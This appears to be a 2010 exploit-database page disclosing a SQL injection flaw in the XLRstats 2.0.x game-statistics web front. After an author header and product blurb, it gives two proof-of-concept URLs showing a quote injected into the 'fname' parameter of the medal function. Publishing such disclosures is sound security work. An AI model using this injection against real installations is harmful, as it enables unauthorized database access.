[webapps / 0day] - Xlrstats 2.0.1 SQL Injection Vulnerabilit
Posted on 14 October 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Xlrstats 2.0.1 SQL Injection Vulnerability | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Xlrstats 2.0.1 SQL Injection Vulnerability by Sky4 in webapps / 0day | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>========================================== Xlrstats 2.0.1 SQL Injection Vulnerability ========================================== # Author : Sky4 # Email : Sky4@live.com # Date : 14/10/2010 # homepage : http://www.sky4.tk # Software Link: http://www.bigbrotherbot.net/forums/downloads/?sa=view;down=100 # Script homepage:http://www.xlrstats.com/ # Version: 2.0.1 / 2.0.2 /2.0.3 ---------------------------------------------------------- [About The Program] XLRstats is the only Real Time game stats program out there. When you make a kill in game, it's in the stats at the very same moment! No cronjobs and perl programs to generate statistics... REAL TIME!XLRstats is a statistics plugin for BigBrotherBot (B3) and it stores all kill-events in a mySQL database. Stats are available in game using the !xlrstats command in chat, but much more can be viewed in the XLRstats web front!Analyze your weapon usage, where do you hit your enemies, who are your worst enemies... all this and more information is available on the site.Version 2 comes with ranks, medals and several templates. With the templates it's very easy to create your own look and feel. Create your own template matching your clans website... no problem.-----------------------------------------------------------<<[ Exploit ]>>--http://www.localhost.com/xlrstats/index.php?func=medal&fname=1 [demo]http://www.localhost.com/xlrstats/index.php?func=medal&fname='1'------------------------------------ ############################################################## # www.sky4.tk # # sky4@live.com # 4hm4d H0w4ri # Palestine In our Hearts ############################################################## # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-14]</pre></body></html>
